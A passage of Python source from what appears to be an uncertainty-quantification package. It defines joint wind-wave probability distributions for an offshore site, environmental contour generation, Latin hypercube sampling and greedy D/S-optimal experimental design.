self.shape= 2.029
self.loc = 0
self.scale= 9.409
self.dist = stats.weibull_min(c=self.shape, loc=self.loc, scale=self.scale) #0 #Hs_scale * (-np.log(1-u)) **(1/Hs_shape)
def ppf(self, u):
"""
Percent point function (inverse of cdf — percentiles)
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
x = self.dist.ppf(u)
return x
def cdf(self, x):
"""
Cumulative distribution function.
"""
u = self.dist.cdf(x)
return u
def rvs(self, size=1, random_state=None):
"""
Random variates.
"""
x = self.dist.rvs(size=size, random_state=random_state)
return x
def pdf(self, x):
"""
Probability density function.
"""
y = self.dist.pdf(x)
return y
class DistHs_Uw(object):
def __init__(self, uw):
self.name = 'weibull'
self.a1, self.a2, self.a3 = 2.136, 0.013, 1.709
self.b1, self.b2, self.b3 = 1.816, 0.024, 1.787
self.shape= self.a1 + self.a2 * uw ** self.a3
self.loc = 0
self.scale= self.b1 + self.b2 * uw ** self.b3
self.dist = stats.weibull_min(c=self.shape, loc=self.loc, scale=self.scale)
def ppf(self, u):
"""
Percent point function (inverse of cdf — percentiles)
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
x = self.dist.ppf(u)
return x
def cdf(self, x):
"""
Cumulative distribution function.
"""
u = self.dist.cdf(x)
return u
def rvs(self, size=1, random_state=None):
"""
Random variates.
"""
x = self.dist.rvs(size=size, random_state=random_state)
return x
def pdf(self, x):
"""
Probability density function.
"""
y = self.dist.pdf(x)
return y
class DistTp_HsUw(object):
def __init__(self, Uw, Hs):
"""
Conditional distribution of Tp given var
"""
self.name = 'lognorm'
theta, gamma = -0.255, 1.0
e1, e2, e3 = 8.0, 1.938, 0.486
f1, f2, f3 = 2.5, 3.001, 0.745
k1, k2, k3 = -0.001, 0.316, -0.145
Tp_bar = e1 + e2 * Hs**e3
u_bar = f1 + f2 * Hs**f3
niu_Tp = k1 + k2 * np.exp(Hs*k3)
mu_Tp = Tp_bar * (1 + theta * ((Uw - u_bar)/u_bar)**gamma)
mu_lnTp = np.log(mu_Tp / (np.sqrt(1 + niu_Tp**2)))
sigma_lnTp = np.sqrt(np.log(niu_Tp**2 + 1))
self.shape = sigma_lnTp
self.loc = 0
self.scale = np.exp(mu_lnTp)
self.dist = stats.lognorm(self.shape, loc=self.loc, scale=self.scale)
def ppf(self, u):
"""
Percent point function (inverse of cdf — percentiles)
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
x = self.dist.ppf(u)
return x
def cdf(self, x):
"""
Cumulative distribution function.
"""
u = self.dist.cdf(x)
return u
def rvs(self, size=1, random_state=None):
"""
Random variates.
"""
x = self.dist.rvs(size=size, random_state=random_state)
return x
def pdf(self, x):
"""
Probability density function.
"""
y = self.dist.pdf(x)
return y
def dist_tp(self, Hs, Uw):
# if len(var) == 1:
# c1, c2, c3 = 1.886, 0.365, 0.312
# d1, d2, d3 = 0.001, 0.105, -0.264
# h = var[0][0]
# mu_LTC = c1 + c2 * h ** c3
# sigma_LTC = (d1 + d2 * np.exp(d3 * h))** 0.5
# dist = cp.Lognormal(mu_LTC, sigma_LTC)
# return dist
# elif len(var) == 2:
return dist
class DistHs(object):
"""
Hybrid lognormal and Weibull distribution, i.e., the Lonowe model
"""
def __init__(self):
self.name = 'Lonowe'
self.mu_Hs = 0.871
self.sigma_Hs = 0.506
self.Hs_shape = 1.433
self.Hs_scale = 2.547
self.h0 = 5.0
self.dist1 = stats.lognorm(s=self.sigma_Hs, scale=np.exp(self.mu_Hs))
self.dist2 = stats.weibull_min(c=self.Hs_shape, scale=self.Hs_scale)
def ppf(self, u):
"""
Return Hs samples corresponding ppf values u
"""
assert np.logical_and(u >=0, u <=1).all(), 'CDF values should be in range [0,1]'
hs1 = self.dist1.ppf(u)
hs2 = self.dist2.ppf(u)
hs = np.where(hs1 < self.h0, hs1, hs2)
return hs
def cdf(self, hs):
"""
Return Hs cdf
"""
hs_cdf1 = self.dist1.cdf(hs)
hs_cdf2 = self.dist2.cdf(hs)
hs_cdf = np.where(hs < self.h0, hs_cdf1, hs_cdf2)
return hs_cdf
def rvs(self, size=1):
hs1 = self.dist1.rvs(size=size)
hs2 = self.dist2.rvs(size=size)
hs = np.where(hs1 < self.h0, hs1, hs2)
return hs
def pdf(self, hs):
hs_pdf1 = self.dist1.pdf(hs)
hs_pdf2 = self.dist2.pdf(hs)
hs_pdf = np.where(hs < self.h0, hs_pdf1, hs_pdf2)
return hs_pdf
class DistTp_Hs(object):
def __init__(self, hs):
self.a1 = 1.886
self.a2 = 0.365
self.a3 = 0.312
self.b1 = 0.001
self.b2 = 0.105
self.b3 = 0.264
self.hs = hs
self.dist = stats.lognorm(s=1)
def rvs(self, size=1):
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp = stats.lognorm.rvs(sigma_tp, loc=0, scale=np.exp(mu_tp), size=[size,self.hs.size])
tp = np.squeeze(tp)
assert self.hs.shape == tp.shape
return tp
def ppf(self, u):
"""
Generate Tp sample values based on given Hs values:
"""
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp = stats.lognorm.ppf(u, sigma_tp, loc=0, scale=np.exp(mu_tp))
return tp
def cdf(self, tp):
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp_cdf = stats.lognorm.cdf(tp, sigma_tp, loc=0, scale=np.exp(mu_tp))
return tp_cdf
def pdf(self, tp):
mu_tp = self.a1 + self.a2* self.hs**self.a3
sigma_tp = np.sqrt(self.b1 + self.b2*np.exp(-self.b3*self.hs))
tp_pdf = stats.lognorm.pdf(tp, sigma_tp, loc=0, scale=np.exp(mu_tp))
return tp_pdf
class Norway5(EnvBase):
"""
Reference:
Norway 5:
<NAME>, <NAME>, <NAME>. Joint environmental data at five european offshore sites for design of combined wind and wave
energy concepts. 32nd International Conference on Ocean, Offshore, and Arctic Engineering, Nantes, France, Paper
No. OMAE2013-10156, 2013.
"""
def __init__(self, spectrum='jonswap', ndim=3):
self.spectrum = spectrum
self.site = 'Norway5'
self.ndim = int(ndim)
self.is_arg_rand = [True, ] * self.ndim
if self.ndim == 3:
self.dist_name = ['weibull','weibull','lognorm']
elif self.ndim == 2:
self.dist_name = ['Lonowe','lognorm']
def dist_uw(self):
return DistUw()
def dist_hs(self, uw=None):
if self.ndim==2:
return DistHs()
elif self.ndim==3:
return DistHs_Uw(uw)
def dist_tp(self, hs, uw=None):
if self.ndim==2:
return DistTp_Hs(hs)
elif self.ndim==3:
return DistTp_HsUw(uw, hs)
def pdf(self, x):
"""
Return pdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(3, n)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_pdf = self.dist_uw().pdf(uw)
hs_pdf = self.dist_hs(uw).pdf(hs)
tp_pdf = self.dist_tp(uw, hs).pdf(tp)
pdf_y = np.array([uw_pdf, hs_pdf, tp_pdf])
elif x.shape[0] == 2:
hs, tp = x
hs_pdf = self.dist_hs().pdf(hs)
tp_pdf = self.dist_tp(hs).pdf(tp)
pdf_y = np.array([hs_pdf, tp_pdf])
else:
raise ValueError('uqra.environment.{:s} expecting 2 or 3 random variables but {:d} are given'.format(self.site,x.shape[0]))
return pdf_y
def jpdf(self, x):
"""
Return joint pdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(n,)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_pdf = self.dist_uw().pdf(uw)
hs_pdf = self.dist_hs(uw).pdf(hs)
tp_pdf = self.dist_tp(uw, hs).pdf(tp)
pdf_y = uw_pdf * hs_pdf * tp_pdf
elif x.shape[0] == 2:
hs, tp = x
hs_pdf = self.dist_hs().pdf(hs)
tp_pdf = self.dist_tp(hs).pdf(tp)
pdf_y = hs_pdf * tp_pdf
else:
raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(x.shape[0]))
return pdf_y
def cdf(self, x):
"""
Return cdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(3, n)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_cdf = self.dist_uw().cdf(uw)
hs_cdf = self.dist_hs(uw).cdf(hs)
tp_cdf = self.dist_tp(uw, hs).cdf(tp)
cdf_y = np.array([uw_cdf , hs_cdf , tp_cdf])
elif x.shape[0] == 2:
hs, tp = x
hs_cdf = self.dist_hs().cdf(hs)
tp_cdf = self.dist_tp(hs).cdf(tp)
cdf_y = np.array([hs_cdf , tp_cdf])
else:
raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(x.shape[0]))
return cdf_y
def jcdf(self, x):
"""
Return cdf values for given random variables x
parameters:
x, ndarray of shape (3, n)
Return:
y, ndarray of shape(n,)
"""
if x.shape[0] == 3:
uw, hs, tp = x
uw_cdf = self.dist_uw().cdf(uw)
hs_cdf = self.dist_hs(uw).cdf(hs)
tp_cdf = self.dist_tp(uw, hs).cdf(tp)
cdf_y = uw_cdf * hs_cdf * tp_cdf
elif x.shape[0] == 2:
hs, tp = x
hs_cdf = self.dist_hs().cdf(hs)
tp_cdf = self.dist_tp(hs).cdf(tp)
cdf_y = hs_cdf * tp_cdf
else:
raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(x.shape[0]))
return cdf_y
def ppf(self, u):
"""
Return Percent point function (inverse of cdf — percentiles) corresponding to u.
"""
u = np.array(u, ndmin=2)
if u.shape[0] == 3:
### make sure u is valid cdf values
assert np.amin(u).all() >= 0
assert np.amax(u).all() <= 1
uw = self.dist_uw().ppf(u[0])
hs = self.dist_hs(uw).ppf(u[1])
tp = self.dist_tp(hs, uw).ppf(u[2])
res = np.array([uw, hs, tp])
elif u.shape[0] == 2:
### make sure u is valid cdf values
assert np.amin(u).all() >= 0
assert np.amax(u).all() <= 1
hs = self.dist_hs().ppf(u[0])
tp = self.dist_tp(hs).ppf(u[1])
res = np.array([hs, tp])
else:
raise ValueError('Norway5 site expects 2 or 3 random variables [(Uw), Hs, Tp], but {:d} were given'.format(x.shape[0]))
return res
def rvs(self, size=None):
"""
Generate random sample for Norway5
"""
n = int(size)
if self.ndim == 3:
### generate n random Uw
uw = self.dist_uw().rvs(size=(n,))
### generate n random Hs
hs = self.dist_hs(uw).rvs(size=1)
### generate n random Tp given above Hs
tp = self.dist_tp(hs, uw).rvs(size=1)
res = np.array([uw, hs, tp])
elif self.ndim ==2:
hs = self.dist_hs().rvs(size=(n,))
### generate n random Tp given above Hs
tp = self.dist_tp(hs).rvs(size=1)
res = np.array([hs, tp])
return res
def support(self):
return ((0, np.inf),) * self.ndim
def environment_contour(self, P, T=1000, n=100, q=0.5):
"""
Return samples for Environment Contours method
arguments:
P: return period in years
T: simulation duration in seconds
n: no. of samples on the contour
q: fractile for the response variable. q=0.5 corresponds the median response
Returns:
ndarray of shape (4, n)
"""
print(r'Calculating Environment Contour samples for Norway5: {}-D'.format(self.ndim))
print(r' - {:<25s}: {}'.format('Return period (years)', P))
print(r' - {:<25s}: {}'.format('Simulation duration (sec)', T))
print(r' - {:<25s}: {}'.format('Response fractile ', q))
prob_fail = 1.0/(P * 365.25*24*3600/T)
beta = -stats.norm().ppf(prob_fail) ## reliability index
r = np.sqrt(beta**2-stats.norm(0,1).ppf(q)**2)
print(r' - {:<25s}: {:.2e}'.format('Failure probability', prob_fail))
print(r' - {:<25s}: {:.2f}'.format('Reliability index', beta))
print(r' - {:<25s}: {:.2f}'.format('Circle radius', r))
if self.ndim == 2:
U = self._create_circle(r, n=n)
elif self.ndim ==3:
U = self._create_sphere(r, n=n)
else:
raise NotImplementedError
X = self.ppf(stats.norm().cdf(U))
return U, X
def target_contour(self, uw, P, T=1000, n=100):
"""
Return EC points for specified points Uw
"""
prob_fail = T/(P * 365.25*24*3600)
beta = -stats.norm().ppf(prob_fail) ## reliability index
u1 = stats.norm().ppf(self.dist_uw().cdf(uw))
u2 = np.sqrt(beta**2 - u1**2)
u3 = u2 * 0
hs = self.dist_hs(uw).ppf(u2)
tp = self.dist_tp(hs, uw).ppf(u3)
res = np.array([uw, hs, tp])
return res
# ===========================================================
# Sequence of conditional distributions based on Rosenblatt transformation
# ===========================================================
def _create_circle(self, r, n=100):
"""
return coordinates of points on a 2D circle with radius r
Parameters:
r: radius
n: number of points on circle
Return:
ndarray of shape(2,n)
"""
t = np.linspace(0, np.pi * 2.0, n)
x = r * np.cos(t)
y = r * np.sin(t)
res = np.array([x, y])
return res
def _create_sphere(self, r, n=10):
lst = []
for phi in [(pi*i)/(n-1) for i in range(n)]:
M = int(sin(phi)*(n-1))+1
for theta in [(2*pi*i)/M for i in range(M)]:
x = r * sin(phi) * cos(theta)
y = r * sin(phi) * sin(theta)
z = r * cos(phi)
lst.append((x, y, z))
return np.array(lst).T
```
#### File: uqra/experiment/lhs.py
```python
import inspect
import numpy as np
import scipy
import pyDOE2
from uqra.experiment._experimentbase import ExperimentBase
from uqra.utilities.helpers import num2print
import warnings
warnings.filterwarnings("ignore", category=RuntimeWarning)
class LatinHyperCube(ExperimentBase):
""" Experimental Design with Lazin Hyper Cube"""
def __init__(self, distributions, **kwargs):
"""
distributions: list of scipy distributions object samples are drawn
Optional:
criterion: a string that tells lhs how to sample the points
- default: “maximin” or “m”: maximize the minimum distance between points, but place the point in a randomized location within its interval
- None, simply randomizes the points within the intervals
- 'center' or “c”: center the points within the sampling intervals
-
- “centermaximin” or “cm”: same as “maximin”, but centered within the intervals
- “correlation” or “corr”: minimize the maximum correlation coefficient
"""
### return a list of distributions and set ndim
self.ndim, self.distributions = super()._set_distributions(distributions)
self.criterion = kwargs.get('criterion', 'maximin')
self.iterations= kwargs.get('iterations', 5)
self.filename = '_'.join(['DoE', 'Lhs'])
def __str__(self):
if self.distributions is None:
message = 'Random samples, no distribution has been set yet }'
else:
dist_names = []
for idist in self.distributions:
try:
dist_names.append(idist.name)
except:
dist_names.append(idist.dist.name)
message = 'Random samples from: {}'.format(dist_names)
return message
def samples(self, size=1,loc=0, scale=1, random_state=None):
"""
LHS sampling from distributions
Arguments:
n_samples: int, number of samples
theta: list of [loc, scale] parameters for distributions
For those distributions not specified with (loc, scale), the default value (0,1) will be applied
Return:
Experiment samples of shape(ndim, n_samples)
"""
size = super()._check_int(size)
locs, scales = super()._set_parameters(loc, scale)
lhs_u = []
for isize in size:
u = pyDOE2.lhs(self.ndim, samples=isize,
criterion=self.criterion, iterations=self.iterations,random_state=random_state).T
lhs_u.append(u)
lhs_u = np.squeeze(lhs_u)
lhs_u = np.array([idist.ppf(iu) for iu, idist in zip(lhs_u, self.distributions)])
lhs_u = np.array([iu * iscale + iloc for iu, iloc, iscale in zip(lhs_u, locs, scales)])
return lhs_u
```
#### File: uqra/experiment/optimal_design.py
```python
from uqra.experiment._experimentbase import ExperimentBase
import uqra.utilities.helpers as helpers
import numpy as np, scipy as sp
import copy
import itertools
from tqdm import tqdm
import time, math
import multiprocessing as mp
import warnings
class OptimalDesign(ExperimentBase):
""" Quasi-Optimal Experimental Design and Optimal Design"""
def __init__(self, X):
"""
Optimal/Quasi Optimal Experimental design:
Arguments:
X: {array-like, sparse matrix} of shape (n_samples, n_features)
optimal_samples: list of indices for optimal samples
"""
super().__init__()
## return the candidate design matrix after removing selected rows
self.X = np.array(X, copy=False, ndmin=2, dtype=np.float64)
self.optimal_samples = []
self.candidate_samples = list(np.arange(X.shape[0]))
def __str__(self):
return('UQRA.Experiment.OptimalDesign')
def samples(self, optimality, n, initialization='AFP', algorithm='GREEDY', **kwargs):
"""
Perform Optimal design with specified optimality, return n samples
Return n new samples from X : Design matrix X(u) of shape(n_samples, n_features)
Arguments:
optimality: str, alphabetic optimal design
n: int, number of new samples TO BE ADDED
initialization: method to initialize optimal sample sets
1. 'TSM': truncated square matrices
2. 'AFP': Approximated Fekete Point
3. a list of indices represeting selected samples from candidate
algorithm: algorithm employed to perform each optimality
Optional:
is_orth_col: boolean, True if columns of design matrix is orthogonal to each other asymptotically
Return:
list of row indices selected
"""
n = helpers.check_int(n)
optimality = str(optimality).upper()
# self.filename = '_'.join(['DoE', optimality])
print(' > UQRA {:s}-Optimality Design: n={:d} ...'.format(optimality, n))
if isinstance(initialization, str):
## selected optimal samples must be empty
assert len(self.optimal_samples) == 0
n_initialization = min(self.X.shape[0], self.X.shape[1], n)
if initialization.upper() in ['QR', 'RRQR', 'AFP', 'FEKETE']:
optimal_samples = self._initial_samples_rrqr(n_initialization)
print(' -> 1: Initialization ({:s}), n={:d} ...'.format(initialization, len(optimal_samples)))
elif initialization.upper() in ['TSM', 'TRUNCATED', 'SQUARE']:
optimal_samples = self._initial_samples_greedy_tsm(n_initialization, optimality)
print(' -> 1: Initialization ({:s}), n={:d} ...'.format(initialization, len(optimal_samples)))
else:
print(' -> UQRA {:s}-Optimality Design: Initialization {:s} NOT implemented'.format(initialization))
raise NotImplementedError
n = n - len(optimal_samples)
elif isinstance(initialization, (list, tuple, np.ndarray, np.generic)):
## Initialize with preselected sampels
X_rank = min(self.X.shape) ## rank of design matrix
optimal_samples = list(np.array(initialization).flatten())
print(' -> 1: Initialization with selected samples: n={:d} ...'.format(len(optimal_samples)))
## if preselected samples is less than X_rank, truncated square matrix is used
if len(optimal_samples) < X_rank:
optimal_samples0 = self._initial_samples_greedy_tsm(min(X_rank-len(optimal_samples),n), optimality,
optimal_samples=optimal_samples)
### optimal_samples0 includes preselected samples in optimal_samples
n = n - len(optimal_samples0) + len(optimal_samples)
optimal_samples = optimal_samples0
else:
print(' > {} not implemented for UQRA.OptiamlDesign'.format(initialization))
raise NotImplementedError
self.optimal_samples = optimal_samples
self.candidate_samples = self._list_diff(self.candidate_samples, optimal_samples)
assert self._check_complement(self.optimal_samples, self.candidate_samples)
if n>0:
print(' -> 2: Continue Optimality Design, n={:d} ...'.format(n))
if optimality.upper() == 'D':
optimal_samples = self.get_D_Optimality_samples(n, algorithm=algorithm)
elif optimality.upper() == 'S':
optimal_samples = self.get_S_Optimality_samples(n, algorithm=algorithm)
else:
raise ValueError('optimality {} not defined'.format(optimality))
else:
optimal_samples = []
self.optimal_samples = self._list_union(self.optimal_samples , optimal_samples)
self.candidate_samples = self._list_diff (self.candidate_samples, optimal_samples)
assert self._check_complement(self.optimal_samples, self.candidate_samples)
return self.optimal_samples
def get_D_Optimality_samples(self, n, algorithm):
"""
Optimal design with D-optimality
Arguments:
n: int, number of samples to be returned
Algorithm: str, algorithms used to generated D-optimal samples
Available in reference:
1 General Exchange Procedure
2 DETMAX Algorithm
3 Fedorov Algorithm
4 Modified Fedorov Algorithm
5 k-Exchange Algorithm
6 kl-Exchange Algorithm
7 Modified kl-Exchange Algorithm
Available in MATLAB:
cordexch
rowexch
Algorithms reference:
<NAME>. (2008). Design of experiments: the D-optimal approach and its implementation as a computer initialization. Bachelor's Thesis in Information and Communication Technology.
"""
if algorithm.upper() == 'GREEDY':
candidate_samples = copy.deepcopy(self.candidate_samples)
optimal_samples = copy.deepcopy(self.optimal_samples)
for _ in tqdm(range(n), ascii=True, desc=" [Greedy D]",ncols=80):
## find the next optimal index from Q which is not currently selected
candidate_samples = self._list_diff(candidate_samples, optimal_samples)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples ,:]
X_sltd = self.X[optimal_samples,:]
## calculate (log)S values for each row in X_cand together with X_sltd
optimality_values = self._greedy_update_D_Optimality_full(X_sltd, X_cand)
if len(optimality_values) != len(candidate_samples):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(candidate_samples), len(optimality_values)))
i = candidate_samples[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
## check if this index is already selected
if i in optimal_samples:
print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples.append(i)
else:
print('NotImplementedError: UQRA.OptimalDesign.get_D_Optimality_samples: algorithm {:s} not implemented...'.format(algorithm))
raise NotImplementedError
optimal_samples = self._list_diff(optimal_samples, self.optimal_samples)
return optimal_samples
def get_S_Optimality_samples(self, n, algorithm):
"""
Optimal design with S-optimality
Arguments:
n: int, number of samples to be returned
Algorithm: str, algorithms used to initialize S-optimal samples
Algorithms reference:
<NAME>., <NAME>., <NAME>., & <NAME>. (2010). Computing multivariate Fekete and Leja points by numerical linear algebra. SIAM Journal on Numerical Analysis, 48(5), 1984-1999.
"""
if algorithm.upper() == 'GREEDY':
candidate_samples = copy.deepcopy(self.candidate_samples)
optimal_samples = copy.deepcopy(self.optimal_samples)
for _ in tqdm(range(n), ascii=True, desc=" [Greedy S]",ncols=80):
## find the next optimal index from Q which is not currently selected
candidate_samples = self._list_diff(candidate_samples, optimal_samples)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples ,:]
X_sltd = self.X[optimal_samples,:]
## calculate (log)S values for each row in X_cand together with X_sltd
optimality_values = self._greedy_update_S_Optimality_full(X_sltd, X_cand)
if len(optimality_values) != len(candidate_samples):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(candidate_samples), len(optimality_values)))
i = candidate_samples[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
## check if this index is already selected
if i in optimal_samples:
print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples.append(i)
else:
print('NotImplementedError: UQRA.OptimalDesign.get_D_Optimality_samples: algorithm {:s} not implemented...'.format(algorithm))
raise NotImplementedError
optimal_samples = self._list_diff(optimal_samples, self.optimal_samples)
return optimal_samples
def _initial_samples_rrqr(self, n):
"""
Return rows corresponding to largest absolute singular values in design matrix X based on RRQR
Arguments:
n: set of selected indices
"""
n = helpers.check_int(n)
X = self.X[self.candidate_samples, :]
if n > min(X.shape):
raise ValueError('Can only return at most rank(X) samples')
# print(' - [Initialization (RRQR)]'.ljust(80, '#'))
_,_,Pivot = sp.linalg.qr(X.T, pivoting=True)
optimal_samples = [self.candidate_samples[i] for i in Pivot[:n]]
return optimal_samples
def _initial_samples_greedy_tsm(self, n, optimality, optimal_samples=None):
"""
return initial samples selected based with truncated square matrices
"""
n = helpers.check_int(n)
if n > min(len(self.candidate_samples), self.X.shape[1]):
raise ValueError('Can only return at most rank(X) samples')
## if no samples are selected currectly, then first sample is drawn randomly
## the rest n-1 samples are draw with greedy algorithm successfully
if optimal_samples is None:
optimal_samples = [np.random.randint(0, self.X.shape[0], size=1).item(),]
n = n-1
candidate_samples = copy.deepcopy(self.candidate_samples)
optimal_samples = copy.deepcopy(optimal_samples)
for _ in tqdm(range(n), ascii=True, desc=" - [Initialization (TSM)-{:s}]".format(optimality),ncols=80):
# for _ in range(n):
## find the next optimal index from Q which is not currently selected
candidate_samples = self._list_diff(candidate_samples, optimal_samples)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples ,:]
X_sltd = self.X[optimal_samples,:]
## calculate (log)S values for each row in X_cand together with X_sltd
if optimality == 'S':
optimality_values = self._greedy_update_S_Optimality_truncate(X_sltd, X_cand)
# np.savetxt('optimality_values_S{:d}.csv'.format(optimality_values.size), optimality_values, delimiter=",")
elif optimality == 'D':
optimality_values = self._greedy_update_D_Optimality_truncate(X_sltd, X_cand)
# np.savetxt('optimality_values_D{:d}.csv'.format(optimality_values.size), optimality_values, delimiter=",")
else:
print(' > UQRA {:s}-Optimal Design for TSM{:s} NOT implemented'.format(optimality))
raise NotImplementedError
if len(optimality_values) != len(candidate_samples):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(candidate_samples), len(optimality_values)))
i = candidate_samples[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
# print(optimality_values.T, i)
## check if this index is already selected
if i in optimal_samples:
print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples.append(i)
return optimal_samples
def _greedy_update_S_Optimality_full(self, A, B):
"""
Calculate S-value with matrix determinant update formula for each row element in B
Only for overdetermined system, i.e. A.T * A is not singular, i.e. n0 > p
Arguments:
A: ndarray of shape(n0, p), selected
B: ndarray of shape(n1, p), candidate
Return:
log(S-values): S([A; r.T]), r is row in B
"""
A = np.array(A, copy=False, ndmin=2)
B = np.array(B, copy=False, ndmin=2)
if A.shape[0] < A.shape[1]:
raise ValueError('S-value updating formula only works for overdetermined system, however given {}'.format(A.shape))
if A.shape[1] != B.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
n0, p = A.shape
n1, p = B.shape
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (p, p)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
d1 = np.log(1.0 + (B.dot(AAinv) * B).sum(-1)) ## (n1,)
A_col_norm = np.linalg.norm(A, axis=0)
d2 = np.sum(np.log(A_col_norm**2 + B**2), axis=1) ## (n1)
res = d1 - d2
return np.squeeze(res)
def _greedy_update_D_Optimality_full(self, A, B):
"""
Only for overdetermined system, i.e. A.T * A is not singular, i.e. n0 > p
Arguments:
A: ndarray of shape(n0, p), selected
B: ndarray of shape(n1, p), candidate
Return:
log(S-values): S([A; r.T]), r is row in B
"""
A = np.array(A, copy=False, ndmin=2)
B = np.array(B, copy=False, ndmin=2)
if A.shape[0] < A.shape[1]:
raise ValueError('Updating formula for S-value only works for overdetermined system')
if A.shape[1] != B.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
n0, p = A.shape
n1, p = B.shape
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (p, p)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
res = 1.0 + (B.dot(AAinv) * B).sum(-1) ## (n1,)
return np.squeeze(res)
def _greedy_update_S_Optimality_truncate(self, X0, X1):
"""
Calculate the S-value (without determinant) of a candidate vector w.r.t selected subsets
when the current selection k < p (eqn. 3.18)
Arguments:
X0 -- selected submatrix of shape (k,p), A
X1 -- candidate matrix of shape (n-k, p), B
Return:
S value without determinant (eqn. 3.18)
"""
X0 = np.array(X0, copy=False, ndmin=2)
X1 = np.array(X1, copy=False, ndmin=2)
if X0.shape[0] > X0.shape[1]:
raise ValueError('Updating formula for S-value only works for underdetermined system')
if X0.shape[1] != X1.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
k,p = X0.shape
n_k, p = X1.shape
# start = time.time()
A = copy.copy(X0[0:k, 0:k]) ## shape (k, k)
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
R = copy.copy(X1[:, 0:k]) ## shape (n-k, k)
B = AAinv.dot(R.T) ## shape (k, n-k)
c = copy.copy(X0[0:k, k]).reshape((k,1)) ## shape(k, 1) column vector
g = AAinv.dot(A.T).dot(c) ## shape (k, 1)
gamma = X1[:,k] ## shape (n-k,)
### calculating alpha with broadcasting
### eqn: 3.14-> alpha = Alpha1 * Alpha2 * Alph3
### Alpha1 = c.T A + gamma * r.T
### Alpha2 = I - b * r.T / (1 + r.T * b)
### Alpha3 = g + gamma * b
Alpha1 = R.T * gamma ## R[:,i] * gamma[i] , shape (k, n-k)
Alpha1 = c.T.dot(A) + Alpha1.T ## shape (n-k, k), add c.T.dot(A) to each row of Alpha1.T
Alpha3 = g + B * gamma ## shape (k, n-k)
size_of_array_8gb = 1e8
multiprocessing_threshold= 100
## size of largest array is of shape (n-k, k, k)
if n_k * k * k < size_of_array_8gb:
d1 = 1.0 + (R * B.T).sum(-1) ### shape (n-k, )
Alpha2 = B.T[:,:,np.newaxis] * R[:,np.newaxis] ### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
# Alpha = [ia.dot(ib).dot(ic).item() for ia, ib, ic in zip(Alpha1[:,np.newaxis], Alpha2, Alpha3.T[:,:,np.newaxis])]
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[:,np.newaxis], Alpha2, optimize='greedy')
Alpha = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[:,:,np.newaxis], optimize='greedy')
else:
batch_size = math.floor(size_of_array_8gb/k/k) ## large memory is allocated as 8 GB
Alpha = []
# for i in tqdm(range(math.ceil(n_k/batch_size)), ascii=True, desc=' Batch (n={:d}): -'.format(batch_size),ncols=80):
for i in range(math.ceil(n_k/batch_size)):
idx_start = i*batch_size
idx_end = min((i+1) * batch_size, n_k)
R_ = R[idx_start:idx_end, :]
B_ = B[:, idx_start:idx_end]
# time0 = time.time()
d1 = 1.0 + (R_ * B_.T).sum(-1) ### shape (n-k, )
Alpha2 = B_.T[:,:,np.newaxis] * R_[:,np.newaxis]### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[idx_start:idx_end,np.newaxis], Alpha2, optimize='greedy')
